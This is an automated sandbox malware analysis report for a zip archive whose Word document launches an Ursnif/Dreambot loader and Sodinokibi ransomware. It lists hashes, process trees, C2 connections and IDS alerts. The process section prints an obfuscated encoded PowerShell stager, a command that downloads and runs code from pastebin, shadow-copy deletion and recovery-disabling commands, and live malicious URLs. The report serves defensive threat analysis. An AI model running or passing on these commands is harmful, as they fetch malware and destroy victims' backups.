analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Migross.zip

Full analysis: https://app.any.run/tasks/d1c11f59-fa9b-49c4-a9d4-3bccaf768e70
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: July 17, 2019, 10:04:42
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
gozi
ursnif
loader
ransomware
sodinokibi
trojan
dreambot
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

F47F4835E7A89020BEF5F5E8FF66DB5B

SHA1:

CD937F00436A8B3BE3774A5365A6BB3609462B02

SHA256:

CDC4CC3E1CD801629EBDBBFA793DCFD2E054EE36ECD227C881DED511ACB30317

SSDEEP:

768:5ksK3eM2ZFoXO2s7/uttJeMN4Cca+/y4OUZumaIGM5xzWJ/w6SMzwou0L8V4aH1:y0M2ZFoPs7/ut3PNupyhU4g5xzz6lwoG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • FJkRriTG.exe (PID: 2864)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 2944)

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2892)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2892)

    • URSNIF was detected

      • powershell.exe (PID: 2944)
      • IEXPLORE.EXE (PID: 2476)
      • IEXPLORE.EXE (PID: 1008)
      • IEXPLORE.EXE (PID: 2916)

    • Sodinokibi keys found

      • powershell.exe (PID: 2272)

    • Changes settings of System certificates

      • powershell.exe (PID: 2272)

    • Sodinokibi ransom note found

      • powershell.exe (PID: 2272)

    • Renames files like Ransomware

      • powershell.exe (PID: 2272)

    • Dropped file may contain instructions of ransomware

      • powershell.exe (PID: 2272)

    • Deletes shadow copies

      • cmd.exe (PID: 2628)

    • Connects to CnC server

      • IEXPLORE.EXE (PID: 2476)
      • IEXPLORE.EXE (PID: 1008)
      • IEXPLORE.EXE (PID: 2916)

  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 3044)

    • Executes PowerShell scripts

      • powershell.exe (PID: 2944)
      • powershell.exe (PID: 2244)

    • Creates files in the user directory

      • powershell.exe (PID: 2944)
      • powershell.exe (PID: 2244)
      • powershell.exe (PID: 2272)

    • Reads the machine GUID from the registry

      • powershell.exe (PID: 2944)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2944)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2272)

    • Application launched itself

      • powershell.exe (PID: 2244)

    • Executed via COM

      • unsecapp.exe (PID: 128)
      • iexplore.exe (PID: 2732)
      • iexplore.exe (PID: 2728)
      • iexplore.exe (PID: 2540)

    • Creates files like Ransomware instruction

      • powershell.exe (PID: 2272)

    • Creates files in the program directory

      • powershell.exe (PID: 2272)

    • Executed as Windows Service

      • vssvc.exe (PID: 2312)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2892)
      • IEXPLORE.EXE (PID: 2476)
      • IEXPLORE.EXE (PID: 1008)
      • IEXPLORE.EXE (PID: 2916)

    • Reads the machine GUID from the registry

      • WINWORD.EXE (PID: 2892)
      • iexplore.exe (PID: 2732)
      • iexplore.exe (PID: 2728)
      • iexplore.exe (PID: 2540)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2892)

    • Reads settings of System Certificates

      • powershell.exe (PID: 2244)
      • powershell.exe (PID: 2272)
      • iexplore.exe (PID: 2732)
      • IEXPLORE.EXE (PID: 2476)
      • iexplore.exe (PID: 2728)

    • Dropped object may contain TOR URL's

      • powershell.exe (PID: 2272)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2732)
      • iexplore.exe (PID: 2728)
      • iexplore.exe (PID: 2540)

    • Changes internet zones settings

      • iexplore.exe (PID: 2732)
      • iexplore.exe (PID: 2728)
      • iexplore.exe (PID: 2540)

    • Reads internet explorer settings

      • IEXPLORE.EXE (PID: 2476)
      • IEXPLORE.EXE (PID: 1008)
      • IEXPLORE.EXE (PID: 2916)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: info_17.07.doc
ZipUncompressedSize: 74752
ZipCompressedSize: 47562
ZipCRC: 0xdcf74718
ZipModifyDate: 2019:07:17 06:46:00
ZipCompression: Deflated
ZipBitFlag: 0x0009
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
61
Monitored processes
16
Malicious processes
12
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winrar.exe no specs winword.exe no specs #URSNIF powershell.exe fjkrritg.exe no specs powershell.exe #SODINOKIBI powershell.exe unsecapp.exe no specs cmd.exe no specs vssadmin.exe no specs vssvc.exe no specs iexplore.exe #URSNIF iexplore.exe iexplore.exe #URSNIF iexplore.exe iexplore.exe #URSNIF iexplore.exe

Process information

PID
CMD
Path
Indicators
Parent process
3044"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\Migross.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2892"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb3044.41288\info_17.07.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.5123.5000
2944"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enc IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAG8ATQBCAGEAcwBlADYANABzAHQAcgBpAG4ARwAoACcAVABaAEIAZgBiADQASQB3AEYATQBYAGYAbAArAHcANwA5AEkARwBsAEUARwBhAEoAbQA0AHMASwBJAGMAcwBpAHoAcgBBAFoATgBQADQASgBTADcAWQBsAEYAaQB6AFEAVwBXAGwARABxADgAaQBJADMAMwAwAHMAVQBiAGUAWABlADEALwBPAHUAZgBmADgAagB1AFoAWAB2AHMAQwB2AGMAKwBBAEMAKwBQAHkAeQBtAFIAVgAwAE0AWQBLAE8AdABoAFMAbABDAEUATgBYAEkALwBuAGUAMwBrAGwAUwBpAEkASQBuAGwAQgBFAFQAZgBrAEIAVABPADEAbABNAGkATQBpAEIATgBHAEwAZQBTAGYAcgBMAHQAWQB0ADAAbQBFAE0AVABrAHIATABGAG0AeABWADkAawBWAGgAQgBBAHcAUgBrAHQAVgBpAGgAawBFAFMAcgB3AFoAaQBTAFkATwBGAG8AKwA5ADMATQBtAHoAeAA5AEQAMQB5AFkASwBTAFYAcwB5ADAAcABpAHYASwAwAFkASQB6AFEAcQBjAEUAYQAzAFMASABGAGgAeQBhAHIAawBWAHAASgB5AFgAaQBLAFIAaQBVAGYAbQByAGcAOAB4AHcAMQBKADIAVQBYAHAAZwBFAEUAbgBCAHEATgBMAGgARABUAFMAYwBoAEIAYwBFAHgANQBtAHUAKwBWAE8AeAA3AFEAUQAwAEIARABRAEgAbAB5AGQARwByAFkAcQBxAFAAawBWAEUASABpADgARAB4AHIARwBYACsARwB6ADQAWgA3AGcARgBKADEANwBEADgAUgBPAGcANgB3ADMASQBpAEsAaQBXADMAMQBBAG8AMABvAHgAdABnADMARgBXAEkARABZAE0AUgBpAG8ARAByAFoAUwBBAHUAMwA2ADMAYQA0AEQANgAzAGEATQA0AHoAYgBsAFUATgBKAFoAbwBXAHYAQwBZAFMAUABsAHAAMgAvAE0ARgBuAGkAbgA5AGMAagBsAHEAVQBtADYAYwA0AHoASABHAEsAcwA3AHEANAA5AEUAQgAvAHYAQgBOAC8AeABjAHMASAAwACsAdwBOADEAZQBGAG4ANgBmADYAdQBaAGwAMgA3AHcARwAxACsALwBlAG8AMwBXAG0AagB1ADAANwBQAFMAdQBWAHYARwA5AEEAdwBuAE8AdQByAEgAdwA9AD0AJwApACAALABbAHMAWQBzAFQAZQBtAC4AaQBvAC4AYwBPAE0AcABSAGUAUwBzAGkATwBOAC4AQwBvAG0AcAByAGUAcwBzAEkATwBOAE0ATwBEAEUAXQA6ADoARABFAEMAbwBtAHAAcgBlAFMAUwAgACkAfAAmACgAJwBmACcAKwAnAG8AcgBlACcAKwAnAGEAYwBIACcAKQB7ACAAJgAoACcATgBFAFcALQBvAGIAJwArACcASgAnACsAJwBFAGMAVAAnACkAIAAgAGkAYABvAC4AYABTAGAAVAByAGUAYQBtAFIARQBBAEQARQBSACgAJABfACwAWwBzAHkAUwBUAGUAbQAuAFQARQB4AFQALgBFAE4AYwBvAGQASQBuAEcAXQA6ADoAYQBzAEMAaQBpACkAIAB9AHwALgAoACcARgBvAHIARQBhACcAKwAnAEMAJwArACcASAAnACkAewAkAF8ALgByAGUAYQBkAHQAbwBlAG4AZAAoACkAIAB9ACAAKQAgAHwALgAoACcASQAnACsAJwBFACcAIAArACAAJwBYACcAKQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2864"C:\Users\admin\FJkRriTG.exe" C:\Users\admin\FJkRriTG.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2244"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" IEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/CY2EEMJN'));Invoke-OKBOLXIE;Start-Sleep -s 1000000; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2272"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" IEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/CY2EEMJN'));Invoke-OKBOLXIE;Start-Sleep -s 1000000; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
128C:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\wbem\unsecapp.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Sink to receive asynchronous callbacks for WMI client application
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2628"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailuresC:\Windows\SysWOW64\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2896vssadmin.exe Delete Shadows /All /Quiet C:\Windows\SysWOW64\vssadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Command Line Interface for Microsoft® Volume Shadow Copy Service
Exit code:
2
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2312C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft® Volume Shadow Copy Service
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
4 670
Read events
3 761
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
163
Text files
56
Unknown types
11

Dropped files

PID
Process
Filename
Type
2892WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRB8C7.tmp.cvr
MD5:
SHA256:
2944powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IJR3QTOMOMVI3DYSGV0Y.temp
MD5:
SHA256:
2244powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HGWE8X9VJDHXJR6MIR0T.temp
MD5:
SHA256:
2272powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J8NKT29EW16VXOY1G5JP.temp
MD5:
SHA256:
2892WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFB133626BFA3A05CA.TMP
MD5:
SHA256:
2892WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFB5902A6EB4FE88EE.TMP
MD5:
SHA256:
2892WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFADDBF7C641CB25D6.TMP
MD5:
SHA256:
2892WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:12FB54C3F15518F422F857D1EFD58EF4
SHA256:05A69C5F7DAB6B84042D4D46A943A0224321121F9CDF2E16BA6AAAD41FF47CED
2244powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:BD76C0D74E0A3C9BC90062B3228E3D74
SHA256:3F4158B8331D1FE0A8703698620335636BA826D164CC54A3D42A0A2F6D6EA343
3044WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIb3044.41288\info_17.07.docdocument
MD5:9B637E90A4FCD86F2070D60A4F42CC52
SHA256:E8C1360A9B36EF1E4F93FC17D95963A47EC87AD3C3D85A5E0A16C29D00D53CD9
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
351
TCP/UDP connections
349
DNS requests
319
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2476
IEXPLORE.EXE
GET
301
40.113.200.201:80
http://microsoft.com/images/nBrq_2F3d/apHE2BGLsXaL2ZOkffhv/7LWFEZ5QOEnTweznFEV/onPKCYI2LcwYIHJR3C5PKG/pVbxIHrZYBvS7/0Pku_2Bj/AyKcPGHHyAmGlOQY7H7EW_2/BXqQ0OEYW6/QZQqq9PKA0Rzm9PWg/qMs2byxPXRyfCD/y.avi
US
whitelisted
2244
powershell.exe
GET
200
104.20.208.21:443
https://pastebin.com/raw/CY2EEMJN
US
text
332 Kb
shared
2944
powershell.exe
GET
200
185.193.141.248:80
http://185.193.141.248/gs.php
RU
text
406 b
suspicious
2272
powershell.exe
GET
200
104.20.208.21:443
https://pastebin.com/raw/CY2EEMJN
US
text
332 Kb
shared
2476
IEXPLORE.EXE
GET
404
2.18.233.62:443
https://www.microsoft.com/images/nBrq_2F3d/apHE2BGLsXaL2ZOkffhv/7LWFEZ5QOEnTweznFEV/onPKCYI2LcwYIHJR3C5PKG/pVbxIHrZYBvS7/0Pku_2Bj/AyKcPGHHyAmGlOQY7H7EW_2/BXqQ0OEYW6/QZQqq9PKA0Rzm9PWg/qMs2byxPXRyfCD/y.avi
unknown
html
55.1 Kb
whitelisted
2944
powershell.exe
GET
200
185.193.141.146:80
http://fcamylleibrahim.top/sywo/fgoow.php?l=dxclass7.gxl
RU
executable
472 Kb
malicious
2476
IEXPLORE.EXE
GET
204
2.18.232.244:443
https://uhf.microsoft.com/_log?o=mscc&s=Microsoft.OneRenderFramework.Core&m=show&nv=aspnet-3.1.3&sv=0.1.2
unknown
whitelisted
2476
IEXPLORE.EXE
GET
200
2.16.186.11:443
https://statics-uhf-wus.akamaized.net/shell/_scrf/js/themes=default/54-af9f9f/c0-247156/de-099401/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/7f-652c90/63-077520/a4-34de62/75-71ddfc/db-bc0148/dc-7e9864/78-4c7d22/9f-d154ca/e4-8302f6/cd-23d3b0/6d-1e7ed0/b7-cadaa7/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/79-499886/7e-cda2d3/32-6dafa3/93-283c2d/e0-3c9860/91-97a04f/1f-100dea/33-abe4df/18-d72213?ver=2.0&iife=1
unknown
text
125 Kb
whitelisted
2476
IEXPLORE.EXE
GET
200
2.18.233.62:443
https://c.s-microsoft.com/mscc/statics/mscc-0.4.1.min.css
unknown
text
1.38 Kb
whitelisted
2476
IEXPLORE.EXE
GET
200
2.16.186.40:443
https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
unknown
image
3.96 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2476
IEXPLORE.EXE
40.113.200.201:80
microsoft.com
Microsoft Corporation
US
malicious
2244
powershell.exe
104.20.208.21:443
pastebin.com
Cloudflare Inc
US
shared
2476
IEXPLORE.EXE
2.18.233.62:443
www.microsoft.com
Akamai International B.V.
whitelisted
2944
powershell.exe
185.193.141.146:80
fcamylleibrahim.top
IT Mir LLC
RU
suspicious
2732
iexplore.exe
204.79.197.200:443
www.bing.com
Microsoft Corporation
US
whitelisted
2476
IEXPLORE.EXE
2.16.186.11:443
statics-uhf-wus.akamaized.net
Akamai International B.V.
whitelisted
2476
IEXPLORE.EXE
152.199.19.160:443
ajax.aspnetcdn.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
2272
powershell.exe
104.20.208.21:443
pastebin.com
Cloudflare Inc
US
shared
2944
powershell.exe
185.193.141.248:80
IT Mir LLC
RU
suspicious
2476
IEXPLORE.EXE
2.16.186.40:443
img-prod-cms-rt-microsoft-com.akamaized.net
Akamai International B.V.
whitelisted

DNS requests

Domain
IP
Reputation
fcamylleibrahim.top
  • 185.193.141.146
malicious
pastebin.com
  • 104.20.208.21
  • 104.20.209.21
shared
microsoft.com
  • 40.113.200.201
  • 104.215.148.63
  • 13.77.161.179
  • 40.76.4.15
  • 40.112.72.205
whitelisted
www.microsoft.com
  • 2.18.233.62
whitelisted
assets.onestore.ms
  • 104.103.98.233
whitelisted
statics-uhf-wus.akamaized.net
  • 2.16.186.11
  • 2.16.186.32
whitelisted
c.s-microsoft.com
  • 2.18.233.62
whitelisted
ajax.aspnetcdn.com
  • 152.199.19.160
whitelisted
img-prod-cms-rt-microsoft-com.akamaized.net
  • 2.16.186.40
  • 2.16.186.27
whitelisted
api.bing.com
  • 13.107.5.80
whitelisted

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
2944
powershell.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
2944
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2944
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2944
powershell.exe
Misc activity
ET INFO Possible EXE Download From Suspicious TLD
2944
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2476
IEXPLORE.EXE
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
Potentially Bad Traffic
ET DNS Query for .su TLD (Soviet Union) Often Malware Related
2944
powershell.exe
A Network Trojan was detected
ET INFO PowerShell DownloadString Command Common In Powershell Stagers
1008
IEXPLORE.EXE
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
7 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Migross.zip